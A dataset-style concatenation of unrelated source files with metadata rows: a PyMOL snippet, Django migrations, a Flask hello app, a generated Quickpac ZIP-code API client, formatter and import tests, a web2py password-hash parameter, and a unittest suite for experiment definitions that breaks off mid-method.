jupyterlab2pymolpysnips/H-bonds/distance.py
|
MooersLab/pymolpysnips
|
50a89c85adf8006d85c1d6cd3f8aad7e440a0b92
|
[
"MIT"
] | null | null | null |
"""
cmd.do('distance ${1:dist3}, ${2:/rcsb074137//B/IOD`605/I`B}, ${3:/rcsb074137//B/IOD`605/I`A}')
"""
cmd.do('distance dist3, /rcsb074137//B/IOD`605/I`B, /rcsb074137//B/IOD`605/I`A')
# Description: H-bond distances.
# Source: placeHolder
| 27.111111
| 95
| 0.643443
| 41
| 244
| 3.829268
| 0.463415
| 0.280255
| 0.356688
| 0.433121
| 0.484076
| 0.484076
| 0
| 0
| 0
| 0
| 0
| 0.183857
| 0.086066
| 244
| 8
| 96
| 30.5
| 0.520179
| 0.610656
| 0
| 0
| 0
| 1
| 0.823529
| 0.623529
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0929ccba5be3fa64a3ef479a8870d54f065cbabf
| 2,505
|
py
|
Python
|
src/pretix/base/migrations/0100_auto_20181023_2300.py
|
pajowu/pretix
|
d6985123b4528f134ead71ce0a4613c9a309fd2c
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,248
|
2015-04-24T13:32:06.000Z
|
2022-03-29T07:01:36.000Z
|
src/pretix/base/migrations/0100_auto_20181023_2300.py
|
pajowu/pretix
|
d6985123b4528f134ead71ce0a4613c9a309fd2c
|
[
"ECL-2.0",
"Apache-2.0"
] | 2,113
|
2015-02-18T18:58:16.000Z
|
2022-03-31T11:12:32.000Z
|
src/pretix/base/migrations/0100_auto_20181023_2300.py
|
pajowu/pretix
|
d6985123b4528f134ead71ce0a4613c9a309fd2c
|
[
"ECL-2.0",
"Apache-2.0"
] | 453
|
2015-05-13T09:29:06.000Z
|
2022-03-24T13:39:16.000Z
|
# Generated by Django 2.1 on 2018-10-23 23:00
import django_countries.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0099_auto_20180912_1035'),
]
operations = [
migrations.AddField(
model_name='invoice',
name='invoice_from_city',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_country',
field=django_countries.fields.CountryField(max_length=2, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_name',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_tax_id',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_vat_id',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_from_zipcode',
field=models.CharField(max_length=190, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_city',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_company',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_country',
field=django_countries.fields.CountryField(max_length=2, null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_name',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_street',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_vat_id',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='invoice',
name='invoice_to_zipcode',
field=models.CharField(max_length=190, null=True),
),
]
| 31.3125
| 80
| 0.567665
| 245
| 2,505
| 5.57551
| 0.195918
| 0.20937
| 0.218887
| 0.256955
| 0.839678
| 0.839678
| 0.839678
| 0.839678
| 0.803807
| 0.764275
| 0
| 0.029412
| 0.321357
| 2,505
| 79
| 81
| 31.708861
| 0.774118
| 0.017166
| 0
| 0.712329
| 1
| 0
| 0.143902
| 0.00935
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027397
| 0
| 0.068493
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
0940bfab0ebba11557aa3ef9d2c0cd4973ba6dbe
| 522
|
py
|
Python
|
python/testData/formatter/fromImportTrailingCommaWithParentheses_after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/formatter/fromImportTrailingCommaWithParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/formatter/fromImportTrailingCommaWithParentheses_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from module import foo
from module import foo, bar
from module import foo, bar,
# | margin
from module import (foo, bar,
baz, )
from module import (foo,
bar, )
from module import (foo,
bar, )
from module import (foo,
bar, # comment
)
from module import (foo,
bar, )
from module import (foo,
bar, )
from module import (
foo,
bar, # comment
)
| 20.076923
| 37
| 0.45977
| 53
| 522
| 4.528302
| 0.150943
| 0.416667
| 0.666667
| 0.791667
| 0.883333
| 0.791667
| 0.791667
| 0.791667
| 0.791667
| 0.791667
| 0
| 0
| 0.471264
| 522
| 25
| 38
| 20.88
| 0.869565
| 0.045977
| 0
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
11c1e5a7fb1343fb7225d996ae033facec29da52
| 1,757
|
py
|
Python
|
make_queue/migrations/0021_alter_id_fields_to_use_bigautofield.py
|
MAKENTNU/web
|
7a5b512bf4c087d1561cdb623d7df4b3d04811a2
|
[
"MIT"
] | 10
|
2017-11-25T01:47:20.000Z
|
2020-03-24T18:28:24.000Z
|
make_queue/migrations/0021_alter_id_fields_to_use_bigautofield.py
|
MAKENTNU/web
|
7a5b512bf4c087d1561cdb623d7df4b3d04811a2
|
[
"MIT"
] | 319
|
2017-11-16T09:56:03.000Z
|
2022-03-28T00:24:37.000Z
|
make_queue/migrations/0021_alter_id_fields_to_use_bigautofield.py
|
MAKENTNU/web
|
7a5b512bf4c087d1561cdb623d7df4b3d04811a2
|
[
"MIT"
] | 6
|
2017-11-12T14:04:08.000Z
|
2021-03-10T09:41:18.000Z
|
# Generated by Django 3.2.2 on 2021-05-11 15:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('make_queue', '0020_printer3dcourse_advanced_course'),
]
operations = [
migrations.AlterField(
model_name='machine',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='machinetype',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='machineusagerule',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='printer3dcourse',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='quota',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='reservation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='reservationrule',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 35.857143
| 111
| 0.611838
| 177
| 1,757
| 5.892655
| 0.259887
| 0.080537
| 0.167785
| 0.194631
| 0.737296
| 0.737296
| 0.737296
| 0.737296
| 0.737296
| 0.737296
| 0
| 0.016368
| 0.269778
| 1,757
| 48
| 112
| 36.604167
| 0.796571
| 0.025612
| 0
| 0.666667
| 1
| 0
| 0.090058
| 0.021053
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.095238
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eead57a9b9271885bd99186436507d54f8ae2a64
| 69
|
py
|
Python
|
lw_visutils/data/__init__.py
|
wolterlw/lw_visutils
|
1487a235c8c0cd71b42758ccb13760a45689889b
|
[
"MIT"
] | null | null | null |
lw_visutils/data/__init__.py
|
wolterlw/lw_visutils
|
1487a235c8c0cd71b42758ccb13760a45689889b
|
[
"MIT"
] | null | null | null |
lw_visutils/data/__init__.py
|
wolterlw/lw_visutils
|
1487a235c8c0cd71b42758ccb13760a45689889b
|
[
"MIT"
] | null | null | null |
import lw_visutils.data.wrappers
import lw_visutils.data.transformers
| 34.5
| 36
| 0.898551
| 10
| 69
| 6
| 0.6
| 0.266667
| 0.533333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 69
| 2
| 36
| 34.5
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0183624fde61b9b8bb023787016c964c88412b6b
| 170
|
py
|
Python
|
flask/app/views.py
|
hou2zi0/flask-app-docker
|
0e51b1f00201fc6eb46a62d0d8f2701bc02d4031
|
[
"MIT"
] | null | null | null |
flask/app/views.py
|
hou2zi0/flask-app-docker
|
0e51b1f00201fc6eb46a62d0d8f2701bc02d4031
|
[
"MIT"
] | null | null | null |
flask/app/views.py
|
hou2zi0/flask-app-docker
|
0e51b1f00201fc6eb46a62d0d8f2701bc02d4031
|
[
"MIT"
] | null | null | null |
from app import app
@app.route('/')
def index():
return "Hello from Flask! 🐵"
@app.route('/affe')
def affe():
return "Hello from Flask! Affe sagt Hallo! 🐵"
| 17
| 49
| 0.611765
| 26
| 170
| 4.076923
| 0.5
| 0.150943
| 0.283019
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217647
| 170
| 9
| 50
| 18.888889
| 0.781955
| 0
| 0
| 0
| 0
| 0
| 0.358824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
6dac5fc789cda2aff36b9b3c5169ab6b88531a81
| 8,692
|
py
|
Python
|
quickpac/api/zip_api.py
|
camptocamp/quickpack-client
|
761c08bdc3846c724adbc99b589d2db460a6bcdc
|
[
"MIT"
] | null | null | null |
quickpac/api/zip_api.py
|
camptocamp/quickpack-client
|
761c08bdc3846c724adbc99b589d2db460a6bcdc
|
[
"MIT"
] | null | null | null |
quickpac/api/zip_api.py
|
camptocamp/quickpack-client
|
761c08bdc3846c724adbc99b589d2db460a6bcdc
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Quickpac API
Here you will find all public interfaces to the Quickpac system. # noqa: E501
OpenAPI spec version: v1.00
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from quickpac.api_client import ApiClient
class ZIPApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def z_ip_get_all_zip_codes_get(self, **kwargs): # noqa: E501
"""Returns all currently deliverable and planned postcodes. # noqa: E501
### Deliverable and planned postcodes * This API returns all postcodes in a list which can be supplied by Quickpac now or in the future. * Each postcode contains the first and last day of delivery by Quickpac * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_get_all_zip_codes_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ZIPAllResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.z_ip_get_all_zip_codes_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.z_ip_get_all_zip_codes_get_with_http_info(**kwargs) # noqa: E501
return data
def z_ip_get_all_zip_codes_get_with_http_info(self, **kwargs): # noqa: E501
"""Returns all currently deliverable and planned postcodes. # noqa: E501
### Deliverable and planned postcodes * This API returns all postcodes in a list which can be supplied by Quickpac now or in the future. * Each postcode contains the first and last day of delivery by Quickpac * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_get_all_zip_codes_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ZIPAllResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method z_ip_get_all_zip_codes_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['Basic'] # noqa: E501
return self.api_client.call_api(
'/ZIP/GetAllZipCodes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ZIPAllResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def z_ip_is_deliverable_zip_code_get(self, **kwargs): # noqa: E501
"""Checks whether the requested postcode can currently be delivered. # noqa: E501
### Deliverable zip code * This API checks whether the requested zip code can currently be supplied by Quickpac. * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_is_deliverable_zip_code_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int zip_code: ZIP code in the range from 1,000 - 9,999.
:return: ZIPIsCurrentResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.z_ip_is_deliverable_zip_code_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.z_ip_is_deliverable_zip_code_get_with_http_info(**kwargs) # noqa: E501
return data
def z_ip_is_deliverable_zip_code_get_with_http_info(self, **kwargs): # noqa: E501
"""Checks whether the requested postcode can currently be delivered. # noqa: E501
### Deliverable zip code * This API checks whether the requested zip code can currently be supplied by Quickpac. * In the event of an error, the 'Error' or 'Warning' property is set with one or more corresponding messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.z_ip_is_deliverable_zip_code_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int zip_code: ZIP code in the range from 1,000 - 9,999.
:return: ZIPIsCurrentResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['zip_code'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method z_ip_is_deliverable_zip_code_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'zip_code' in params:
query_params.append(('zipCode', params['zip_code'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['Basic'] # noqa: E501
return self.api_client.call_api(
'/ZIP/IsDeliverableZipCode', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ZIPIsCurrentResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41
| 347
| 0.635987
| 1,091
| 8,692
| 4.816682
| 0.171402
| 0.039581
| 0.030828
| 0.027402
| 0.89705
| 0.891722
| 0.891722
| 0.87079
| 0.860894
| 0.860894
| 0
| 0.016488
| 0.281293
| 8,692
| 211
| 348
| 41.194313
| 0.824716
| 0.426254
| 0
| 0.72381
| 1
| 0
| 0.164182
| 0.047128
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.038095
| 0
| 0.152381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6dae0dd1cece4441cb228e477ab3da4bc72d7aec
| 46
|
py
|
Python
|
skypy/supernova/tests/test_import.py
|
ArthurTolley/skypy
|
5621877ada75c667b1af7e665b02a91026f7ef0f
|
[
"BSD-3-Clause"
] | 1
|
2020-12-28T18:00:24.000Z
|
2020-12-28T18:00:24.000Z
|
skypy/supernova/tests/test_import.py
|
ArthurTolley/skypy
|
5621877ada75c667b1af7e665b02a91026f7ef0f
|
[
"BSD-3-Clause"
] | 2
|
2020-12-28T20:14:40.000Z
|
2020-12-28T21:49:27.000Z
|
skypy/supernova/tests/test_import.py
|
ArthurTolley/skypy
|
5621877ada75c667b1af7e665b02a91026f7ef0f
|
[
"BSD-3-Clause"
] | null | null | null |
def test_import():
import skypy.supernova
| 15.333333
| 26
| 0.73913
| 6
| 46
| 5.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 46
| 2
| 27
| 23
| 0.868421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
111d42e6dc3cd0f6f289feea86436bf95b41463c
| 134
|
py
|
Python
|
tracki/src/domain/entities/__init__.py
|
rok-povsic/Tracki
|
f92fec62fa66e87fa6feb509142f09cd548c570a
|
[
"MIT"
] | null | null | null |
tracki/src/domain/entities/__init__.py
|
rok-povsic/Tracki
|
f92fec62fa66e87fa6feb509142f09cd548c570a
|
[
"MIT"
] | null | null | null |
tracki/src/domain/entities/__init__.py
|
rok-povsic/Tracki
|
f92fec62fa66e87fa6feb509142f09cd548c570a
|
[
"MIT"
] | null | null | null |
from tracki.src.domain.entities.category import Category # noqa F401
from tracki.src.domain.entities.shift import Shift # noqa F401
| 44.666667
| 69
| 0.80597
| 20
| 134
| 5.4
| 0.5
| 0.185185
| 0.240741
| 0.351852
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 0.119403
| 134
| 2
| 70
| 67
| 0.864407
| 0.141791
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1154b3960e4c755151899cc26ab8dfaaa1f0dda8
| 92
|
py
|
Python
|
parameters_8000.py
|
wasuaje/web2py5
|
02f310b9526f92c4ec62ab5b0271069a1c101e9f
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
wasuaje/web2py5
|
02f310b9526f92c4ec62ab5b0271069a1c101e9f
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
wasuaje/web2py5
|
02f310b9526f92c4ec62ab5b0271069a1c101e9f
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$addea80690104c89$e64c88b318e761d47ad2b915b38e2af362e3df15"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.494505
| 0.01087
| 92
| 1
| 92
| 92
| 0.406593
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
febd0ea8f41dc36a7cc485bed62e17ba757e0b86
| 21,828
|
py
|
Python
|
test/test_definition.py
|
gonzalorodrigo/ScSFWorkload
|
2301dacf486df8ed783c0ba33cbbde6e9978c17e
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2019-03-18T18:27:49.000Z
|
2019-03-18T18:27:49.000Z
|
test/test_definition.py
|
gonzalorodrigo/ScSFWorkload
|
2301dacf486df8ed783c0ba33cbbde6e9978c17e
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2020-12-17T21:33:15.000Z
|
2020-12-17T21:35:41.000Z
|
test/test_definition.py
|
gonzalorodrigo/ScSFWorkload
|
2301dacf486df8ed783c0ba33cbbde6e9978c17e
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2021-01-05T08:23:20.000Z
|
2021-01-05T08:23:20.000Z
|
"""
python -m unittest test_definition
"""
from commonLib.DBManager import DB
from orchestration.definition import (ExperimentDefinition,
GroupExperimentDefinition,
DeltaExperimentDefinition)
import datetime
import os
import subprocess
import time
import unittest
class TestExperimentDefinition(unittest.TestCase):
def setUp(self):
self._db = DB(os.getenv("TEST_DB_HOST", "127.0.0.1"),
os.getenv("TEST_DB_NAME", "test"),
os.getenv("TEST_DB_USER", "root"),
os.getenv("TEST_DB_PASS", ""))
def _del_table(self, table_name):
ok = self._db.doUpdate("drop table "+table_name+"")
self.assertTrue(ok, "Table was not created!")
def test_create_table(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
def test_constructor(self):
ed = ExperimentDefinition(
seed="seeeed",
machine="machine",
trace_type="double",
manifest_list=[{"share": 0.2, "manifest": "man1.json"},
{"share":0.8, "manifest": "man2.json"}],
workflow_policy="period",
workflow_period_s=20,
workflow_share=30.0,
workflow_handling="manifest",
subtraces = [100002, 10003],
preload_time_s = 3600*24*3,
workload_duration_s = 3600*24*8,
work_state = "fresher",
analysis_state = "1",
overload_target=2.0,
conf_file="my.conf")
self.assertEqual(ed._experiment_set, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]-period-p20-%30.0-manifest-"
"t[100002,10003]"
"-3d-8d-O2.0-my.conf")
self.assertEqual(ed._name, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]"
"-period-p20-%30.0-manifest-t[100002,10003]-3d-8d-O2.0"
"-my.conf-s[seeeed]")
self.assertEqual(ed._seed, "seeeed")
self.assertEqual(ed._machine, "machine")
self.assertEqual(ed._trace_type, "double")
self.assertEqual(ed._manifest_list, [dict(share=0.2,
manifest="man1.json"),
dict(share=0.8,
manifest="man2.json")])
self.assertEqual(ed._workflow_policy, "period")
self.assertEqual(ed._workflow_period_s, 20)
self.assertEqual(ed._workflow_share, 30.0)
self.assertEqual(ed._workflow_handling, "manifest")
self.assertEqual(ed._subtraces, [100002, 10003])
self.assertEqual(ed._preload_time_s, 3*24*3600)
self.assertEqual(ed._workload_duration_s, 8*24*3600)
self.assertEqual(ed._work_state, "fresher")
self.assertEqual(ed._analysis_state, "1")
self.assertEqual(ed._table_name, "experiment")
self.assertEqual(ed._overload_target,2.0)
self.assertEqual(ed._conf_file, "my.conf")
def test_store_load(self):
ed_old = ExperimentDefinition(
seed="seeeed",
machine="machine",
trace_type="double",
manifest_list=[{"share": 0.2, "manifest": "man1.json"},
{"share":0.8, "manifest": "man2.json"}],
workflow_policy="period",
workflow_period_s=20,
workflow_share=30.0,
workflow_handling="manifest",
subtraces = [100002, 10003],
preload_time_s = 3600*24*3,
workload_duration_s = 3600*24*8,
work_state = "fresher",
analysis_state = "1",
overload_target=2.0,
conf_file="my.conf")
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
trace_id = ed_old.store(self._db)
ed.load(self._db, trace_id)
self.assertEqual(ed._experiment_set, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]-period-p20-%30.0-manifest-"
"t[100002,10003]"
"-3d-8d-O2.0-my.conf")
self.assertEqual(ed._name, "machine-double-m[0.2|man1.json,"
"0.8|man2.json]"
"-period-p20-%30.0-manifest-t[100002,10003]-3d-8d-O2.0"
"-my.conf-s[seeeed]")
self.assertEqual(ed._seed, "seeeed")
self.assertEqual(ed._machine, "machine")
self.assertEqual(ed._trace_type, "double")
self.assertEqual(ed._manifest_list, [dict(share=0.2,
manifest="man1.json"),
dict(share=0.8,
manifest="man2.json")])
self.assertEqual(ed._workflow_policy, "period")
self.assertEqual(ed._workflow_period_s, 20)
self.assertEqual(ed._workflow_share, 30.0)
self.assertEqual(ed._workflow_handling, "manifest")
self.assertEqual(ed._subtraces, [100002, 10003])
self.assertEqual(ed._preload_time_s, 3*24*3600)
self.assertEqual(ed._workload_duration_s, 8*24*3600)
self.assertEqual(ed._work_state, "fresher")
self.assertEqual(ed._analysis_state, "1")
self.assertEqual(ed._table_name, "experiment")
self.assertEqual(ed._overload_target,2.0)
self.assertEqual(ed._conf_file, "my.conf")
def test_get_file_names(self):
ed = ExperimentDefinition(
seed="seeeed",
machine="machine",
trace_type="double",
manifest_list=[{"share": 0.2, "manifest": "man1.json"},
{"share":0.8, "manifest": "man2.json"}],
workflow_policy="period",
workflow_period_s=20,
workflow_share=30.0,
workflow_handling="manifest",
subtraces = [100002, 10003],
preload_time_s = 3600*24*3,
workload_duration_s = 3600*24*8,
work_state = "fresher",
analysis_state = "1")
self.assertEqual(ed.get_trace_file_name(),
"machine-double-m0.2man1.json"
"0.8man2.json"
"-period-p20-30.0-manifest-t10000210003-3d-8d-O0.0"
"-sseeeed.trace")
self.assertEqual(ed.get_qos_file_name(),
"machine-double-m0.2man1.json"
"0.8man2.json"
"-period-p20-30.0-manifest-t10000210003-3d-8d-O0.0"
"-sseeeed.qos")
self.assertEqual(ed.get_users_file_name(),
"machine-double-m0.2man1.json"
"0.8man2.json"
"-period-p20-30.0-manifest-t10000210003-3d-8d-O0.0"
"-sseeeed.users")
def test_get_fresh(self):
ed = ExperimentDefinition()
self.addCleanup(self._del_table, "experiment")
ed.create_table(self._db)
ed.store(self._db)
ed_2 = ExperimentDefinition()
ed_2.store(self._db)
ed_f = ExperimentDefinition()
ed_f.load_fresh(self._db)
self.assertEqual(ed_f._trace_id, 1)
ed_f_2 = ExperimentDefinition()
ed_f_2.load_fresh(self._db)
self.assertEqual(ed_f_2._trace_id, 2)
def test_get_fresh_pending(self):
self.addCleanup(self._del_table, "experiment")
